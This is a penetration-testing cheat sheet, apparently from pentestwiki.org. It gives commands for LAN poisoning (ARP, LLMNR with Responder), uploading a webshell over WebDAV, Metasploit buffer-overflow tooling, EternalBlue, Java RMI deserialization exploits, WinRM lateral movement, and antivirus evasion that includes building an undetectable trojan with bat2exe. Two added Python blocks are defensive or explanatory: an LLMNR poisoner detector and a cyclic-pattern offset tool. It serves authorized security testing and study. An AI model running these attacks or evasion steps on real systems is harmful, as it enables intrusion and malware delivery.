From pentestwiki.org

Physical access (LAN)

MAC flooding

root #macof -n 1000

ARP spoofing

root #arpspoof

root #ettercap

LLMNR poisoning

Responder is an LLMNR, NBT-NS and mDNS poisoner with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication servers supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.

root #responder -I eth0 -rv
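Defender-side view of the same protocol, added here as an example (not from pentestwiki.org or Responder): a poisoner answers LLMNR queries for any name, so a query for a canary name that does not exist on the LAN should never get a reply. The block builds the canary query, parses an LLMNR datagram (DNS wire format, including compression pointers) and raises an alert when a response answers a canary. The transaction id, the name FILESRV01, the reply bytes and the address 10.0.0.66 are constructed for this example.

```python
import socket
import struct

# LLMNR (RFC 4795) reuses the DNS wire format and is sent to the
# 224.0.0.252:5355 multicast group; these constants are protocol facts.
LLMNR_GROUP = ("224.0.0.252", 5355)
QTYPE_A = 1
QCLASS_IN = 1


def encode_name(name: str) -> bytes:
    """DNS label encoding: length-prefixed labels terminated by a zero byte."""
    out = b"".join(bytes([len(label)]) + label.encode("ascii")
                   for label in name.rstrip(".").split("."))
    return out + b"\x00"


def build_query(txid: int, name: str) -> bytes:
    """A canary LLMNR A-record query for a name that does not exist on the LAN."""
    header = struct.pack(">HHHHHH", txid, 0, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack(">HH", QTYPE_A, QCLASS_IN)


def decode_name(buf: bytes, pos: int) -> tuple[str, int]:
    """Decode a name (labels or compression pointer); returns (name, next offset)."""
    labels, end = [], None
    while True:
        length = buf[pos]
        if length & 0xC0 == 0xC0:             # pointer to an earlier name
            if end is None:
                end = pos + 2
            pos = struct.unpack(">H", buf[pos:pos + 2])[0] & 0x3FFF
            continue
        pos += 1
        if length == 0:
            break
        labels.append(buf[pos:pos + length].decode("ascii"))
        pos += length
    return ".".join(labels), end if end is not None else pos


def parse_message(buf: bytes) -> dict:
    """Parse header, question section and A-record answers of an LLMNR message."""
    txid, flags, qd, an, _ns, _ar = struct.unpack(">HHHHHH", buf[:12])
    pos, questions, answers = 12, [], []
    for _ in range(qd):
        name, pos = decode_name(buf, pos)
        pos += 4                               # skip QTYPE/QCLASS
        questions.append(name)
    for _ in range(an):
        name, pos = decode_name(buf, pos)
        rtype, _rclass, _ttl, rdlen = struct.unpack(">HHIH", buf[pos:pos + 10])
        pos += 10
        rdata = buf[pos:pos + rdlen]
        pos += rdlen
        if rtype == QTYPE_A and rdlen == 4:
            answers.append((name, socket.inet_ntoa(rdata)))
    return {"id": txid, "response": bool(flags & 0x8000),
            "questions": questions, "answers": answers}


def detect_poisoner(canaries: dict[int, str], src_ip: str, datagram: bytes) -> list[str]:
    """Alert when a response answers one of our canary queries (txid -> canary name)."""
    msg = parse_message(datagram)
    if not msg["response"] or msg["id"] not in canaries:
        return []
    canary = canaries[msg["id"]]
    return [f"LLMNR poisoner suspected: {src_ip} answered {canary} with {ip}"
            for name, ip in msg["answers"] if name.lower() == canary.lower()]


# Constructed fixture: the datagram a poisoner would return for our canary
# query (transaction id 0x1234, name FILESRV01); bytes hand-assembled here.
CANARIES = {0x1234: "FILESRV01"}
SPOOFED_REPLY = bytes.fromhex(
    "1234" "8000" "0001" "0001" "0000" "0000"          # id, QR=1, 1 question, 1 answer
    "0946494c455352563031" "00" "0001" "0001"           # question: FILESRV01, A, IN
    "c00c" "0001" "0001" "0000001e" "0004" "0a000042"  # answer: ptr->name, TTL 30, 10.0.0.66
)

if __name__ == "__main__":
    print(build_query(0x1234, "FILESRV01").hex())
    for line in detect_poisoner(CANARIES, "10.0.0.66", SPOOFED_REPLY):
        print(line)
```

In practice the canary queries are sent to LLMNR_GROUP from a monitoring host and every UDP reply is fed to detect_poisoner with its source address; the mitigation is to disable LLMNR via the "Turn off multicast name resolution" Group Policy (registry value EnableMulticast=0 under HKLM\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient).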


Find exploits

In Kali:

root #searchsploit <SERVICE NAME>


site:exploit-db.com APP VERSION
$linux-exploit-suggester.sh -k 2.6.9

C:>windows-exploit-suggester.py -i <systeminfo file>


NULL session

C:>net use \\$IP\ipc$ "" "/user:"


WebDAV

$cadaver http://$IP
dav:/> put webshell.aspx


To cross-compile Windows exploits on Linux:

First install the package:

root #apt-get install mingw-w64

  • Command line for C (list -lws2_32 after the source file so the linker resolves the Winsock symbols):
$i686-w64-mingw32-gcc -o 100 100.c -lws2_32

Useful flags:

-l ws2_32 -l mswsock
  • Command line for C++ (the mingw-w64 package installs the toolchain as i686-w64-mingw32-*):
$i686-w64-mingw32-g++ main.cpp -o main -static

  • py2exe (builds Windows executables from Python scripts): http://www.py2exe.org/


Reversing in Linux



Useful radare2 commands:

is: Show symbols
iS: Show sections
ii: Show imports
iI: Binary info
ia: Show all info
i?: All commands starting with i


Egghunter:

$/usr/share/metasploit-framework/tools/exploit/egghunter.rb -f python -e W00T

Buffer Overflow offsets:

$/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 256
$/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 256 -q 773870B4
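What the two Metasploit scripts do, as an added example (not code from pentestwiki.org or Metasploit): the pattern is built from Upper/lower/digit triples so every 4-byte window is unique for the first 20280 bytes, and the register value a debugger shows after a crash is unpacked little-endian and searched for, which gives the distance from the start of the input to the overwritten bytes. The crash value 0x32624131 below is constructed for this example.

```python
import re
import string
import struct
from itertools import cycle, product

# Same alphabet scheme as pattern_create.rb: each 3-byte group is
# Upper/lower/digit, so any 4-byte window is unique within the first
# 26 * 26 * 10 * 3 = 20280 bytes; after that the pattern repeats.
UPPER, LOWER, DIGIT = string.ascii_uppercase, string.ascii_lowercase, string.digits


def pattern_create(length: int) -> bytes:
    """Generate `length` bytes of the cyclic pattern (wraps after 20280 bytes)."""
    out = bytearray()
    for u, l, d in cycle(product(UPPER, LOWER, DIGIT)):
        out += (u + l + d).encode("ascii")
        if len(out) >= length:
            return bytes(out[:length])
    return bytes(out)  # not reached: the loop above always returns


def _needle(query: str) -> bytes:
    """A query prefixed with 0x is the 32-bit register value the debugger showed,
    unpacked little-endian as on x86; anything else is the literal ASCII fragment."""
    if re.fullmatch(r"0x[0-9a-fA-F]{8}", query):
        return struct.pack("<I", int(query, 16))
    return query.encode("ascii")


def pattern_offset(query: str, length: int = 8192) -> list[int]:
    """All offsets where `query` occurs in a pattern of `length` bytes.
    Empty list: the crash value did not come from the pattern (e.g. a real
    address). More than one hit: the pattern was longer than 20280 bytes and
    wrapped, so the result is ambiguous."""
    haystack, needle = pattern_create(length), _needle(query)
    hits, start = [], 0
    while (idx := haystack.find(needle, start)) != -1:
        hits.append(idx)
        start = idx + 1
    return hits


if __name__ == "__main__":
    # Constructed crash: a debugger reported EIP=0x32624131 after the
    # vulnerable field received pattern_create(256).
    print(pattern_create(256).decode())
    print(pattern_offset("0x32624131", 256))  # [35]
```

Use the same length for pattern_offset that was used to generate the crashing input, exactly as the `-l` argument is repeated on the page; a different length can hide a wrap-around.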

Reversing in Windows


  • IDA Pro
  • OllyDbg
  • Immunity Debugger
  • mona.py Corelan Repository for mona.py
  • API Monitor is free software that lets you monitor and control API calls made by applications and services. It's a powerful tool for seeing how applications and services work or for tracking down problems in your own applications.

Reversing .NET



Fuzzing

  • sfuzz (Kali)
  • radamsa
  • spike


AFL is a popular coverage-guided fuzzer. It combines fast target execution with clever heuristics to find new execution paths in the target binary, and it has been used to find a large number of vulnerabilities in real products.

AV Evasion

  • Veil: encrypts/encodes/obfuscates msfvenom-like payloads

Thanks @ReneFreingruber

To strip the /var/lib/veil build paths from the generated binary (Go build flags) and make reverse engineering harder:

-gcflags=-trimpath=/var/lib/veil -asmflags=-trimpath=/var/lib/veil
  • bat2exe

Write a .bat script with your trojan and use bat2exe to get a FUD executable to trojanize an exe or service. https://github.com/islamadel/bat2exe/blob/master/upload/bat2exe.exe

  • Phantom evasion

https://github.com/oddcod3/Phantom-Evasion (interacts with msfvenom).

SMB exploitation

EternalBlue (targets: Windows 7 and Server 2008 R2 (x64), all service packs):

msf>use exploit/windows/smb/ms17_010_eternalblue

Scan a /24 for known SMB vulnerabilities with the nmap smb-vuln-* scripts (unsafe=1 enables checks that can crash the target service):

$nmap -sS -T4 --open -p 139,445 --script=smb-vuln-conficker,smb-vuln-cve2009-3103,smb-vuln-ms06-025,smb-vuln-ms07-029,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-vuln-ms10-061,smb-vuln-regsvc-dos --script-args=unsafe=1 $IP/24


Java RMI

Nmap will recognize it as:

XXXX/tcp  open  rmiregistry       Java RMI

Exploiting RMI

  • With nmap:
    root #nmap --script=rmi-vuln-classloader -p 1099 $IP
    root #nmap --script=rmi-dumpregistry -p 1099 $IP
  • With metasploit:
    msf>use exploit/multi/misc/java_rmi_server
  • With ysoserial:
    $java -cp ysoserial.jar ysoserial.RMIRegistryExploit $IP 1098 CommonsCollections1 calc.exe
  • With java monitoring and performance console (OS performance and application parameters):



WinRM

  • PS>winrs -r:$HOST $CMD
  • PS>Test-WSMan -ComputerName $HOST

More info about WinRM lateral movement: https://www.hackingarticles.in/winrm-penetration-testing/